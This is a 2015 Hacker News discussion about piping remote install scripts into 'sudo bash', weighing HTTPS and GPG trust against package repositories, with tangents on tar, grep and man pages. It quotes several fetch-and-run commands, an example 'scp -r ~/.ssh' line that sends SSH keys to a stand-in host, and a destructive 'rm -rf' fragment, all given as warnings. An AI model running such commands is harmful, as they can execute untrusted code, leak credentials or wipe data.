The sad state of sysadmin in the age of containers

blfr · on April 22, 2015

This bothers me as well. Even tasks as simple as adding a repository are now being "improved" with a curl | sudo bash style setup[1].

However, installing from source with make was (and remains) a mess. It may work if you're dedicated to maintaining one application and (part of) its stack. But even then it usually leads to out of date software and tracking versions by hand.

Many people have this weird aversion to doing basic sysadmin stuff with Linux. What makes it weird is that it's really simple. Often easier than figuring out another deploy system.

(The neckbeard in me blames the popularity of OSX on dev machines.)

[1] https://nodesource.com/blog/nodejs-v012-iojs-and-the-nodesou...

stephenr · on April 22, 2015

I agree that the "just curl this into bash" instructions are nightmare - on any platform.

I think a lot of this is a result of what I like to call the "Kumbaya approach to project/team management":

This is where you have a team (either for a single project or a team at a consulting agency, etc) that is effectively all development-focused staff, possibly with some who dabble in Infrastructure/Ops. In this environment, when a decision about something like "how do we get a reliable build of X for our production server deployment system" needs to be made or a system needs to be supported, no idea is "bad", because no one has the experience or confidence to be able to say "that's a stupid idea, we are not making `curl http://bit.ly/foo | sudo bash` the first line of a deployment script"[1]

[1] yes this is an exaggeration, but there are some simply shocking things happening in real environments, that are not far off that mark.

Edit: to make it absolutely clear about what I was referring to with [1]:

The specific point I was making was running something they don't even see (how many people would actually look at the script before piping it to bash/sh ?) from a non-encrypted source, and relying on a redirection service that could remove/change your short url at any time.

Unfortunately I was stupid enough to ddg it (duckduckgo it, as opposed to google it) and apparently this exact use-case was previously the recommended way of installing RVM[2]

[2] http://stackoverflow.com/questions/5421800/rvm-system-wide-i...

-

DannoHung · on April 22, 2015

I think part of this is because there aren't any trusted, fully open source, artifact repositories that work with the various package indices out there.

Like, most of the way deployment should work is that you come up with some collection of packages that need to be installed and you iterate through and install them. Bob's your uncle.

Thing is, all the packages you need live out in the wild internet. Ideally, you'd just be able to take a package, vet it, and put it in your local artifact store and then when your production deployment system (using apt or yum or pip or gems or maven or whatever) needs a package, it looks at your local artifact store and grabs it and goes about its business. Never knowing or touching the outside world.

And your developers would all write their apps to deploy through the normal packaging methods that everyone and their mother is already familiar with and they could just put them into the existing package index as well.

But you've gotta lay out pretty serious moola (from when I last looked into available solutions to this) or set up a half dozen different artifact stores if you want to do things that way. And good luck managing your cached and private artifacts if you do. And on top of that developers don't necessarily know how to set up a PyPi or a RPM index or whatever so that the storage is reliable and you've got the right security settings or whatever else. (I know I sure don't and I'm not really interested in reading all of the ones I'd end up needing).

StillBored · on April 22, 2015

"And on top of that developers don't necessarily know how to set up a PyPi or a RPM index or whatever so that the storage is reliable and you've got the right security settings or whatever else. (I know I sure don't and I'm not really "

Setting up RPM is shockingly easy. It can get more complex, but the basic system is:

  REPOBASE=/srv/www/htdocs/
  createrepo -v  $REPOBASE
  gpg -a --detach-sign --default-key "Sign Repo" $REPOBASE/repodata/repomd.xml
  gpg -a --export "Sign Repo" > $REPOBASE/repodata/repomd.xml.key

That will create a repo from all the .rpm files in the REPOBASE. Also you will of course need a GPG key pair, but that can be generated with `gpg --gen-key` where you give it a description of "Sign Repo" (or change the above commands to the key description you used).

Then you get to decide on the deployment machine if you want to trust the repo (or you don't trust any and import the key via some other process, aka direct gpg import).

Of course you can find a bunch of more detailed explanations with $SEARCHENGINE, but if it takes more than a day to figure it out, your doing something wrong.

Building a set of RPM's isn't that much harder if you have a proper build system. But these are the kinds of things you give up when you decide to grab the latest immature hotness created by someone on their day off.

tracker1 · on April 22, 2015

With docker, as referenced in TFA... you can simply vet a base image, and use that for your application... upgrades? create a new/updated base image and test/deploy against that.

retrogradeorbit · on April 23, 2015

And how do you "simply vet a base image"?

garthk · on April 23, 2015

Same as everything: look at how it was built. Many of the images are built by CI systems according to Dockerfiles and scripts maintained in public GitHub repos. Audit those, then use them yourself if you're worried about the integrity of the services and systems between the code and the repository.

jkyle · on April 22, 2015

> Unfortunately I was stupid enough to ddg it (duckduckgo it, as opposed to google it) and apparently this exact use-case was previously the recommended way of installing RVM[2]

Not only "previously", it's the current recommended way to install rvm. From their front page:

>> curl -sSL https://get.rvm.io | bash -s stable

[1] http://rvm.io/

plausibility · on April 22, 2015

It's also (one of the) recommended ways to do it for Docker[1]. I've noticed a few blog posts that touch on "here's how to use Docker for X" suggest piping it straight into `sudo sh` without so much as looking at what's going to be run first. Sigh.

[1] http://get.docker.io/

stephenr · on April 22, 2015

Oh I agree there are problems still, but its an improvement over the previous - it's using HTTPS and it's calling the RVM domain - before it was plain HTTP to bit.ly

sciurus · on April 22, 2015

Also the installer is now signed via GPG.

https://rvm.io/rvm/security

acveilleux · on April 22, 2015

But then there's a circular dependency because the GPG key is retrieved by the bash script that is wget'd.

lmm · on April 22, 2015

It doesn't have to be circular. The script is secured by HTTPS (and hopefully has the key embedded in the script itself?) which can then retrieve the installer and verify it using the key.

acveilleux · on April 22, 2015

The problem is that in this scenario, the GPG key and signature serves no practical purpose.

The whole security, whether GPG is invoked or not, relies on the security of the HTTPS connection alone.

If the HTTPS cannot be trusted alone, then everything is lost as a compromised HTTPS connection can be used supply both a comprimised GPG key and a compromised package, or, indeed, anything at all that is legal to `| sudo bash`...

And HTTPS security boils down to:

1. The difficulty of altering (or exploiting privileged position wrt) the global routing table to setup MitM or MitS scenarios.

2. The difficulty of obtaining a valid looking certificate for an arbitrary domain.

Any situation where a government actor is the adversary poses intractable challenges to both 1 and 2 above. (And before you say NSA/GCHQ would never care about XYZ, consider China...

emn13 · on April 22, 2015

Even if you trust "normal" https certificates, it's still a much more risky proposition. Those certificates only really say that somebody control the domain - not (in general) that he actually owns it or is responsible in any way, and, more critically, don't vet whether somebody is trustworthy or not. You can easily get some other similar-sounding domain as a malicious agent, and validly get an https certificate for that.

So even if you trust https works, it's still a tricky proposition - it's not really similar to a distro's package distribution channel.

acveilleux · on April 22, 2015

Indeed, and I didn't even go over trusting the actual source of the bash script or the security/integrity of the server(s) it's hosted on even if the cert is all A-OK.

lmm · on April 23, 2015

It gives people a way to choose the level of security they care about. Those who are willing to trust HTTPS can trust HTTPS. Those who aren't can obtain the GPG key and check its signature by another mechanism (WoT) and manually verify the package signature.

acveilleux · on April 24, 2015

Those who would go out of their way to do the GPG check are also the same people who are horrified by `curl .... | sudo bash`

lmm · on April 26, 2015

Yes, that's the point. Those who aren't horrified can do that. Those who are can get the package "by hand" and do the GPG check themselves.

hellbanner · on April 22, 2015

Same issue when people post GPG keys on their website. You can't verify them.

stephenr · on April 22, 2015

that only becomes applicable if you use their "manual" install steps on that security page.

tammer · on April 22, 2015

Am dealing with this situation right now. Apparently wget -qO- https://get.docker.com/ | sh as root[1] is the "supported" way of installing Discourse

[1]: https://github.com/discourse/discourse/blob/master/docs/INST...

yebyen · on April 22, 2015

No, that's Discourse install instructions quick, hand-wavy way of telling you to install Docker if you don't already have it. If your cloud environment already has Docker installed, you can skip that step.

Are you really trying to say that the instructions for installing Docker should be considered in-scope for a guide to install Discourse on a cloud server?

They've included a short snippet that will get you a Docker, in the way recommended by Docker, for whatever your base system is. Many production systems do not move at the pace of Docker development, so it's not practical to run Docker from your distribution's package archive. Some distros will not have distributed packaged Docker releases at all.

What's wrong with these instructions? If you are really "dealing with this" right now, it is worth noting that something like 20 or more supported platforms have specific Docker installation instructions from the Docker website.

https://docs.docker.com/installation/#installation

From a quick sample of those instructions, only the Ubuntu instruction page uses the wget|sh method, and it's using an SSL connection to Docker's own website to add an apt source with signatures in the supported way. This way should work on any Debian-based or Yum-based distro, and writing the instructions like this must likely save Discourse from getting a lot of "How do I docker" issues and e-mails from their clueless users.

So, would you prefer that part just says "installing Docker is out of scope" or should the Discourse developers go through every distro and cloud system and document the specific instructions for that? To do that would completely defeat the purpose of even using Docker at all.

tammer · on April 22, 2015

I concur - to elaborate, I'm not actually the one installing Discourse. I support a 'Kumbaya' group of data scientists who have never heard of docker.

Quick directions like these aren't questioned by users who just want to get things done, and they invite security risks just as the parent & article suggest.

matt_kantor · on April 22, 2015

There are many more depressing examples of this at http://curlpipesh.tumblr.com

squar1sm · on April 22, 2015

Funny tumblr but makes me care-confused.

I understand that curl pipe sh could have security problems but I also don't see it as that much different than the "normal" and "ok" way of doing things. I would consider something like the below pretty normal.

  wget https://whatever.io/latest.tgz
  tar xzf latest.tgz
  cd whatever-stable
  ./configure && make
  sudo make install

Because of familiarity, we aren't going to be too worried about what we are doing. If we are on a secure system (like a bank or something) then we've probably already gone through a bunch of hoops (source check, research) and we mitigate it like anything else.

What is so different about

  curl https://whatever.io/installer.sh | sudo bash

We didn't check the md5s in the first example, so yolo, we don't care about the content of the tarball we just `make install`-ed. We're assuming the webserver isn't compromised and that https is protecting the transfer. Is it because the tarball hit the disk first? Does that give us a warm fuzzy? Is it because "anything could be in installer.sh!!!?! aaaaah!". Well, anything could be in Makefile too right? Anything could be in main.c or whatever.

I agree that curl sh | sudo bash makes my spidey sense tingle. But if I really cared, I would read the source and do all the normal stuff anyway. So I think it's some kind of weird familiarity phase we're all in.

chousuke · on April 22, 2015

Outside of a development environment, you'd run that ./configure && make install step on a build slave that creates a nice RPM or Debian package of it for you which you can install without fear that the build scripts install backdoors, download obsolete software or wipe the filesystem.

With a good build system (eg. autotools) writing an RPM spec takes almost no time at all and if you have the proper infrastructure in place for building packages, you can have something workable in a very short time.

Self-packaged RPMs also don't need to be quite as high-quality as ones you might want to include in a distribution, so if it makes sense for your use case, it's perfectly okay have "bloat" (eg. an entire python virtualenv) in your package.

bandrami · on April 23, 2015

> With a good build system (eg. autotools)

Yikes. Have we sunk this far?

stephenr · on April 22, 2015

I wouldn't consider what you presented as the "normal" or "ok" way of doing things either, especially not on anything resembling a live (i.e. not development/sandbox) environment.

A distro (or official vendor, or possibly a trusted third-party) repo of pre-built, signed packages would always be my first choice.

If one of those isn't available, my next step would be to create a package for the tool in question, part of which is setting up a file for `uscan` to download new source archives, and compare against the signatures.

In this scenario we (as in the organisation) are now responsible for actually building and maintaining the package, but we can still be assured that it's built from the original sources, we can still install it on production (and even dev, staging, whatever) servers with a simple call to apt/aptitude, and dependencies, removal, upgrades, etc are still handled cleanly.

squar1sm · on April 22, 2015

About "ok". You're right. I probably used a loaded word without context. I too use whatever default package repo, followed by "extras" or whatever is available. You described a sane and nice process. I guess my point is, at some point we are are assuming "many eyes" (the binaries might be built with the previously mentioned make;configure steps) unless you are auditing all sources which is unlikely. Especially unlikely on dev machines. Even after that it seems like there is an infinite continuum of paranoia.

I find it interesting that binary packages have existed for decades and yet `rpm etc` knowledge is rare. Why did curl sh become popular? Why doesn't every project have rpm|deb download links for every distro version? Why don't github projects have binary auto-builds hosted by github? I'd argue that it's too difficult. Binary packaging didn't succeed universally. For deployment, containers are (in the end) easier.

But the original article is conflating container concepts and user behavior (not wrongly). If docker hub does end up hosting malware-laden images, it would be interesting emergent behavior but it would be orthogonal to containers. Like toolbars. Toolbars probably aren't evil. A vector for evil maybe?

stephenr · on April 23, 2015

> I find it interesting that binary packages have existed for decades and yet `rpm etc` knowledge is rare

What makes you think the knowledge is rare? Among developers who actively target linux distributions I would imagine the opposite is true.

Even a number of the referenced curl|bash offenders are just using that as a "shortcut" to add their own apt/yum repos and calling apt-get/yum to install their binary package(s).

rmc · on April 22, 2015

You're first example allows for:

* Using checkinstall to create a local deb/rpm which can be easily installed/removed later instead of "make install". * What if installer.sh says "rm -rf /tmp/PACKAGE-build" and the connection is interrupted just after the first "/", you now have "rm -rf /". Oops. * configure will tell you what files it needs, and apt-file will tell you want dependencies to install. * I know what make install does. I know make. Who wrote installer.sh? Do they know anything about writing good software? Steam wiped out home directories, who knows what these people do

yellowapple · on April 22, 2015

It's bad because `sh`, `bash`, etc. don't wait for the script that's being piped into it to finish downloading before it starts executing it. So, for example, if you're running a script with something like

    # remove the old version of our data
    sudo rm -rf /usr/local/share/some_data_folder

and the network connection cuts out for whatever reason in the middle of that statement (maybe you're on a bit of a spotty wireless network), the resulting partial command will still be run. If it were to cut off at `sudo rm -rf /usr`, then your system is in all likelihood going to be hosed.

jblow · on April 22, 2015

Because now your ability to install your mission-critical software is dependant upon https://whatever.io actually being up. Which it certainly won't be forever.

Or, you know, maybe someone updated the whatever.io installer to make it 'better'. But you are trying to debug some problem and you made one image last month and another one this month and you're pulling your hair out trying to figure out why they are different. Oh, it's because some text changed on some web site somewhere.

You've taken a mandatory step and put it outside your sphere of control.

squar1sm · on April 22, 2015

Good point. I guess you could still wget the script though. It's maybe like ./configure over http? I guess even if you could do it, it's probably not culture. A Dockerfile would probably just curl sh the thing and not wget it. So the default culture probably does depend on whatever.io being up.

yAnonymous · on April 22, 2015

>[1] yes this is an exaggeration

No, it's not :(

tormeh · on April 22, 2015

It's just automated copy-pasting of commands you don't understand from the internet, which is something everyone who runs Linux (and is not a wizard) does all the time.

It's really really bad, but people will continue doing it until commands/things become so easy we can actually understand what we're doing. Unfortunately, this has never been a priority in Unix-land as far as I've gathered.

danieldk · on April 22, 2015

It's really really bad, but people will continue doing it until commands/things become so easy we can actually understand what we're doing.

But it isn't all that hard to understand a clean Unix. I have never copied or typed a command that I don't understand.

One problem may be that most Unices these days is not as clean anymore as, say OpenBSD or NetBSD. E.g. the recent X stack, with D-BUS, various *Kits, etc. is quite opaque. This madness was primarily contained to the desktop and proprietary Unices, but seems to spread through server Linuxes these days as well (and no, this is not an anti-systemd rant).

toyg · on April 22, 2015

> But it isn't all that hard to understand a clean Unix. I have never copied or typed a command that I don't understand.

Well, good for you. I can assure you that it's not the case for almost anyone who approached Linux after the likes of Mandrake were released and/or tried to make it work on anything different from a traditional server.

I'm all for trying to understand what one is doing (and I wholeheartedly agree with TFA's point), but the reality is that very few people in the world really understand all intricacies of one's operating system. This does not excuse poor security practices, but it explains their background.

Twirrim · on April 22, 2015

That's why you get someone who is capable of understanding it.

You wouldn't hire some high school kid who's just about taught themselves HTML by reading a book for a week, and get them to write your web application from ground up. You'd hire someone who knows what they're doing. Why is it seen as any different for Operations work? There is a reason systems administration is a skilled field, and a reason they're paid on a par with developers.

redblacktree · on April 22, 2015

I think the reason this happens less and less is that sysadmins are cost centers, not revenue generators. When you have developers do that work (poorly or not), you don't have a group that's purely cost. Those costs get hidden in the development group.

stephenr · on April 22, 2015

Whoops replied to wrong comment!

However yes the issue of a team that "doesn't make money" is very real. Maybe you it should be "marketed" like legal or accounting: it doesn't make money, it saves money caused by SNAFUBAR situations.

acveilleux · on April 22, 2015

Indeed, the costs merely get hidden and a lot of system decisions boil down to one of:

1. I saw it done that way in some blog.

2. We did it like that at my last job.

3. Seems like it works.

sshconnection · on April 22, 2015

That high school kid needs to install a web server. Is he going to hire someone? No. He's going to copy a curl command.

subway · on April 22, 2015

I expect her to say "How do I install software on this platform?" "Oh! /(apt|yum|dnf)/!"

c22 · on April 22, 2015

It's probably okay for him.

danieldk · on April 22, 2015

I'm all for trying to understand what one is doing (and I wholeheartedly agree with TFA's point), but the reality is that very few people in the world really understand all intricacies of one's operating system.

One of the problems (as I tried to argue) is that most Unices have become far more complex. The question is if the extra complexity is warranted on a server system, especially if bare Unix (OpenBSD serves as a good example here) was not that hard to understand.

Of course, that doesn't necessarily mean that we should look back. Another possibility would be to deploy services as unikernels (see Mirage OS) that use a small, thin, well-understood library layer on top of e.g. Xen, so that there isn't really an exploitable operating system underneath.

digi_owl · on April 22, 2015

What seems to be the source of this push is that some entity wants Windows Group Policy like control over what users can and can't do etc.

This because they want to retain their ability to shop for off the shelf hardware, while getting away from a platform that has proves less than functional for mission critical operations (never mind being locked to a single vendor).

What seems to be happening is that there is a growing disdain for power users and "admins". The only two classes that seems to count are developers and users, and the latter needs to be protected from themselves for their own good (and developer sanity).

corobo · on April 22, 2015

> I have never copied or typed a command that I don't understand.

To note that it's trivial to change what goes into the clipboard too. Copying and pasting commands from potentially untrustworthy sites should be ruled out too, even if understood

TeMPOraL · on April 22, 2015

https://xkcd.com/1168/ comes to mind. And yes, I Google half of the command invocations too (but usually type them in by hand so that I can remember them faster instead of copy-pasting).

falcolas · on April 22, 2015

I don't get this. Tar isn't that hard.

    x = eXtract files from an archive
    f = File path to the archive
    c = Create a new archive from files
    v = print Verbose output
    z = apply gZip the input or output

That's 99% of common tar right there. The remaining one percent is:

    j = apply bzip2 to the input or output
        (I admit, j is a weird one here, though that has made it stick in my memory)
    --list = does what's on the tin
    --exclude = does what's on the tin
    --strip-components = shortcut for dropping a leading directory from the extracted

I haven't used a flag outside of these in recent memory.

TeMPOraL · on April 22, 2015

It isn't, but so aren't dozens or hundreds of other commands you encounter when working with the command line. I managed to memorize a few invocations of tar (I listed them in another comment) but, for instance, I very rarely create a new archive so I'm never sure what flag I need to use.

Part of the problem is that each command line utility has its own flag language, and equivalent functions often have different letters. For instance, very often one command has "recursive" as "-r" while another has it as "-R". It's impossible to remember it all unless you're a sysadmin.

gnaritas · on April 22, 2015

Those case differences have meaning, -r is generally not dangerous while -R is; it's capitalized to make you stop and say hmmm, should I do this. All commands have the same flag language, command -options, and are all easily documented by man command; it quite literally couldn't get any simpler and unnecessary to memorize since you can look up any flag on any command with the same man command. Those who find it confusing haven't spent the least bit of effort actually trying because it's actually very simple and extremely consistent.

lmm · on April 22, 2015

> Those case differences have meaning, -r is generally not dangerous while -R is; it's capitalized to make you stop and say hmmm, should I do this. All commands have the same flag language

Except with cp , -R is the safe one and -r is the dangerous one. And there are tons of little inconsistencies like this.

gnaritas · on April 22, 2015

As I said, generally. All human languages have inconsistencies, the command line is by far one of the most consistent ones any of us deal with.

TeMPOraL · on April 22, 2015

It may be more consistent, but is not easier - humans are generous with regard to input, they can infer intentions from context. I could type in "please unbork this" to a human and he'd know precisely that he has to a) untargzip it, b) change the directory structure and c) upload it to a shared directory for our team.

gnaritas · on April 24, 2015

Welcome to working with computers that can't think; easier is not an option, they can't infer your intentions, so your point is what? Consistency is what matters when working with machines and the command line is a damn consistent language relative to other available options.

TeMPOraL · on April 22, 2015

That's exactly my point.

acveilleux · on April 22, 2015

Frankly, if you're going to rely on a magic recipe from the web for production, you should absolutely document it locally and go through the process of understanding each commands.

As a former sys admin, I did that all the time. Who the hell can remember how to convert an SSL certificate to load it into a Glassfish app server? Didn't mean I couldn't step through all commands and figure out why it did that before I loaded the new cert... And next time, I just need to go to my quick hack repo for the magic incantation.

falcolas · on April 22, 2015

I agree with this. Despite my familiarity with so many command line tools, I do forget invocations. And so I have a wiki page I share with my coworkers to share particularly useful (or correct) invocations of dangerous tools.

On a Unix based system, tar is just used so frequently and for so many purposes, that not understanding it feels a bit like working in a shop and not knowing how to use a roll of tape.

xj9 · on April 22, 2015

You don't have to be a sysadmin to be comfortable with command line tools. If you want to fully utilize your *NIX system you have to learn how to use that shit, it really isn't that hard.

(I'm a developer.)

TeMPOraL · on April 22, 2015

I am comfortable with command line tools. I just don't remember every switch and flag I happen to use twice a year, and the fact that command line utilities are totally inconsistent in subtle but significant ways, coupled with the overall unreadability of man pages and lack of examples in them makes this process difficult.

Symbiote · on April 22, 2015

I'm a very proficient user of command line tools, but I don't remember everything: my shell history is set to 50,000 lines, and it's the first thing I search if I've forgotten something.

Sequences of commands sometimes get pasted into a conveniently-located text file; if I find myself repeating the operation I might turn it into a script, a shell function for my .zshrc, or an alias.

Just 10 minutes ago: mysqldump [args] | nc -v w.x.y.z 1234 nc -v -l 1234 | pv | mysql [args] (after an initial test that showed adding "gzip -1" was slower than uncompressed gigabit ethernet.)

c22 · on April 22, 2015

One way to remember these commands without necessarily going "full sysadmin" is to use them on a daily basis. Whether I am developing, managing files, debugging, or really doing anything other than mindlessly browsing the web, I always have at least one (and often many) xterms open. The huge selection of tools and speed of invocation provided by a modern *nix command line is invaluable for many tasks that are not directly related to administrating a system.

shanemhansen · on April 22, 2015

I usually get tar right on the first try. I only have to remember 2 variants (extract file and create file):

    tar xf ./foo #automagically works with bz2 and gz files
    tar cf /tmp/out.tar . #add z for compression

Gracana · on April 22, 2015

That second one will create a tarbomb[1], which isn't necessarily wrong and maybe it's what's right for your application, but for more general usage this is friendlier:

    tar cf <mydir.tar> <mydir>

[1] http://www.linfo.org/tarbomb.html

markrages · on April 22, 2015

And some of those switches are just for convenience, e.g.:

tar c . | gzip > /tmp/out.tar.gz

TeMPOraL · on April 22, 2015

Oh cool. So that works? I've already memorized:

    tar -xvvzf foo.tar.gz
    tar -xvvjf bar.tar.bz2
    tar -xvvf  baz.tar

Thanks!

stephenr · on April 22, 2015

I would argue that anyone who is reasonably comfortable in a command line would resort to `man command`, `command --help` or `command -h` before googling for usage.

wflann · on April 22, 2015

I think, occasionally, it's a lot easier to grok a command through googling than reading the built-in help. A fair amount of built-in *nix documentation I have run across is mediocre or unhelpful.

Gracana · on April 22, 2015

I often find that GNU man pages are heavy on explanation of options and light on purpose and practical usage (the latter is tucked away in info pages). That's not necessarily the wrong way to do manpages, but I much prefer OpenBSD-style manpages, which seem to be better at providing practical information.

tormeh · on April 22, 2015

Recursively searching through all files in the current folder (aka the normal use case for grep) is accomplished by using "grep -r". It's on line 270 in "man grep". And that assumes that you know what grep is at all. Would it have hurt so much to call grep "regexsearch" instead? Maybe -r could be the default?

jsight · on April 22, 2015

I think a lot of people would hate having it be recursive by default.

Retra · on April 22, 2015

If it were up to me it would be called `find` and it would have flags to find files or text within files.

Pxtl · on April 22, 2015

All the core unix tools have the problem of predating the vowel generation (http://c2.com/cgi/wiki?VowelGeneration).

bcoates · on April 22, 2015

'grep' isn't a case of disemvowelment (there's an e!), it's just a weird mnemonic that's outlived its referent.

markrages · on April 22, 2015

Recursive is not the default use for grep. stdin-stdout filtering is.

"regexsearch" is more work to type and more space taken up everytime 'grep' appears in a command-line. And says nothing about recursion.

gnaritas · on April 22, 2015

Recursion is caused either by -R or -r on nearly all commands and is pretty standard, and r is virtually never the default on any command because that would be a bad idea. And yes, having to type regexsearch rather than grep would have been a bad idea; while grep isn't a great name it's far preferable to someone who types constantly. Search or find would have been better names, names need to be both short and descriptive on the command line, and short comes first.

stephenr · on April 22, 2015

Use the built-in search.

Edit: the rest of my comment (somehow submitted to soon!)

    man grep

    /recurs<enter>

markrages · on April 22, 2015

or use 'grep':

    $ man grep | grep recursive
                  directory,  recursively,  following  symbolic links only if they
                  Exclude  directories  matching  the  pattern  DIR from recursive
           -r, --recursive
                  Read all files  under  each  directory,  recursively,  following
           -R, --dereference-recursive
                  Read all files under each directory,  recursively.   Follow  all

Anderkent · on April 22, 2015

Nah, man pages are usually completely useless. I use man when I remember exactly what I want to do and just aren't sure if the flag was -f or -F. For everything else there's google.

peatmoss · on April 22, 2015

Being a few years gone from working purely in tech, and having a decade of OSX desktop usage finally made me feel I'd gotten complacent. So I installed OpenBSD. Two things of note have happened:

1. I routinely need to look things up that are a bit murky in the deep recesses of my memory.

2. I am reminded continually of how nice it is to have man pages that are well written, are easily searchable, reference appropriate other pages, and are helpful enough to remind you of big picture considerations that you didn't realize you were facing when looking for a commandline flag.

stephenr · on April 22, 2015

Can you give an example of what you might turn to google for (and what you'd search for) that is more productive than checking a manpage/help output?

Anderkent · on April 22, 2015

OK, recent simple example:

Google query: git display file at revision. Immediate answer (without even having to click any links, it's in the result description): `git show revision:file`

Total time: 5 seconds

Trying to reproduce with man and help:

  man git

search for display, finds nothing

start scrolling down

notice git-show (show various types of objects); sounds like a likely candidate

  git show <revision> <file>

..no output

  git show -h

  usage: git log [<options>] [<since>..<until>] [[--] <path>...]
     or: git show [options] <object>...

.. useful

  man git show
  man git-show

OPTIONS <object>... The names of objects to show. For a more complete list of ways to spell object names, see "SPECIFYING REVISIONS" section in git-rev-parse(1).

  man git-rev-parse

a lot about specifying revisions, nothing about how actually specify a file

Give up. Google it.

needs · on April 23, 2015

One reason to keep reading man pages is because you will likely discover new thing you did not expected. Also reading man pages help you to understand the tool philosophy/workflow, if the man page is well writen (which is often the case). This hold for any kind of documentation as well.

When I google something, I usually do not remember the answer to my question, the only thing I remember is the keyword to put in my futur query to get the same answer. You will get your answer quicker, but you wont learn much. So personally, I prefer reading man pages (when I can) than use google.

yAnonymous · on April 23, 2015

I too find it much easier to google for actual working examples of commands rather than the abstract documentation in the manual.

Rsync for example, where trailing slashes make a difference and it's not obvious from skipping over the manual.

Looking at working code/commands often works better than piecing it together from the manual imo.

eropple · on April 22, 2015

I never use man pages, to be honest, and I'm quite comfortable on a command line. Reading long-ish things in a terminal kind of sucks, for me, and even if I end up reading a man page in Chrome it's nicely formatted and has readable serif fonts and is easily scrolled with the trackpad on my laptop.

c22 · on April 22, 2015

I probably haven't read a man page "cover to cover" since high school. Usually I just need to read a couple lines about a specific flag or the location of some configuration file which I can find quickly with a simple search or by scanning the document with my eyes.

stephenr · on April 22, 2015

Your terminal doesn't scroll with wheel/trackpad?

rspeer · on April 22, 2015

The wheel or trackpad scrolls the terminal's scrollback, not the pager program that happens to be running in it.

(I can imagine some sort of hackery that determines if less or something is running and scrolls that, but it sounds like a huge mess. Is that actually what you're doing? Does it send keypresses? What if you're in a mode where those keypresses do something besides scrolling?)

stephenr · on April 22, 2015

No I'm talking about scrolling in the actual program running - it's most useful in a pager obviously, but it also works for editors, and it works both locally (OS X, built-in Terminal.app) and over SSH on Debian hosts.

I'll be honest - I have ~no idea~ (edit: apparently there are xterm control sequences for mouse scrolling) how it's actually implemented, but several tools have some reference to mouse support (tmux, vim, etc) in option/config files, so it's probably available for your distro/platform and just needs to be enabled.

Further edit: (or PS. or whatever):

`less` pager supports mouse scrolling. `more` pager does not!

c22 · on April 22, 2015

I just tried this on debian and my mouse wheel scrolls less inside of my terminal (and returns my previous line buffer when I type 'q').

eropple · on April 22, 2015

It can do continuous scrolling of the terminal or line-by-line scrolling of the pager. Both are poor options for trying to actually read prose content inside the terminal, IMO, and opening a browser is easier.

c22 · on April 22, 2015

What do you mean by "continuous" versus "line-by-line" scrolling? When I use the mousewheel to scroll a man page in xterm it behaves and appears the same as when I use the mousewheel to scroll a webpage in Chrome (the content moves smoothly up and down, disappearing at the top and bottom edges of the viewport).

johnchristopher · on April 25, 2015

some man pages are really obscure though. i am thinking of policy kit and find which can be as long and as arid.

marcosdumay · on April 22, 2015

It's not the same by any measure.

When you read the script in a browser, than pastes it in a terminal, you know that "scp -r ~/.ssh u@somehost.com" isn' there.

jannic · on April 22, 2015

No, you don't:

http://thejh.net/misc/website-terminal-copy-paste

marcosdumay · on April 22, 2015

Fair point.

juliangregorian · on April 22, 2015

Okay, but this relies on CSS trickery. If you had navigated to a text URL this would not be a vector.

shanemhansen · on April 22, 2015

What's a text url? The only way I can see this not being a vector is if you browse with css (and javascript for good measure) turned off. Or use lynx.

juliangregorian · on April 22, 2015

A page of text? With Content-type: text? An example being a shell script?

c22 · on April 22, 2015

Do you think the average user copying and pasting administrative commands into their shell will stop to check the content encoding of the document they are copying from? Do you trust your browser not to try rendering an ill-defined document with an ambiguous extension?

recursive · on April 22, 2015

Do you check the Content-type: header of the response for text/plain before copying? If you do, you'd be in the minority.

ams6110 · on April 22, 2015

This is why you have a strong passphrase on your ssh private key.... right?

marcosdumay · on April 22, 2015

Hum... No. It's trivial to use those scripts to do all kinds of harm. A strong passphrase only protects against this one example.

For example, it won't protect against stealing the .ssh folder and installing a keylogger at your computer.

briffle · on April 22, 2015

Copy-pasting from the internet can be just fine, for things like (for example) yum install <blah> because the tool itself has built in checks to make sure you have a valid, non-corrupt installer before executing, from someone you trust.

michaelmior · on April 22, 2015

The point is that what ends up on your clipboard can be different from what you see and if a new line is there, then the command executes before you have a chance to change your mind.

tracker1 · on April 22, 2015

It's easy enough to download a given/checked version of the script at http://foo.com/ubuntu/install and have that copied and run inside your docker image... for that matter, it's usually adding a given repository to your repo manager, then installing a given package from that software's corporate sponsors.

I don't think the problem is as rampant as it's made out to be in TFA... that said, most people don't look at said script(s), so it's entirely possible something could have been slipped in. For that matter, I think the issues outlined in the article relate more to overly complicated Java solutions (the same happens in the .Net space) that are the result of throwing dozens of developers some with more or less experience than others at a project, and letting a lot of code that isn't very well integrated slide through whatever review process does or doesn't exist.

23david · on April 22, 2015

In my experience, this is mainly describing the sad state of sysadmin work at tech startups. Larger and profitable tech companies tend to take sysadmin work a bit more seriously and give more resources and authority (and pay...) to their TechOps/Devops/Security teams.

stephenr · on April 22, 2015

It seems reasonably common in agency type companies - at the start often their "infra" is an account with a managed web hosting company, ahd when their needs grow it doesn't always become a core part of the business

tribaal · on April 22, 2015

> I think a lot of this is a result of what I like to call the "Kumbaya approach to project/team management"

I'm totally stealing this :)

mreiland · on April 22, 2015

I honestly don't see the issue.

I see the issue with doing it for the general public ala RVM, but internally where you control everything I don't see the issue with curl into sh.

jsprogrammer · on April 22, 2015

It's also the recommended way to install Kubernetes.

hurin · on April 22, 2015

> Many people have this weird aversion to doing basic sysadmin stuff with Linux. What makes it weird is that it's really simple. Often easier than figuring out another deploy system.

While I agree with the articles main points - the GNU build system is far from simple. Basically an arcane syntax limited to unix-based systems and 5 or 6 100+ page manuals to cover.

It doesn't excuse it - but I think it's easy to see why people turn to curl | sudo bash as the author puts it.

pjc50 · on April 22, 2015

Maintaining autoconf/automake stuff is a pain. Using it is usually as simple as "configure;make;make install".

It doesn't do dependency management though, which is an externalised cost. But that's what rpm/deb do.

I see the attraction of containers and disk image based management. It's much less time consuming. But it's very much the opposite of ISO9001-style input traceability.

sltkr · on April 22, 2015

> Using it is usually as simple as "configure;make;make install".

"Usually" indeed. Because if it breaks, you do need to know the implementation details to figure out what's wrong.

Jare · on April 22, 2015

That's the same for "wget|sh", apt-get, npm or any other system. Now, if the argument is that configure tends to break more often and for more obscure reasons, I can tentatively agree with that.

deong · on April 22, 2015

This is the reason why all these standalone things bundle everything into their installation process.

The problem is installing 206 different pythons on my system just makes it more likely that something else is going to break.

garthk · on April 23, 2015

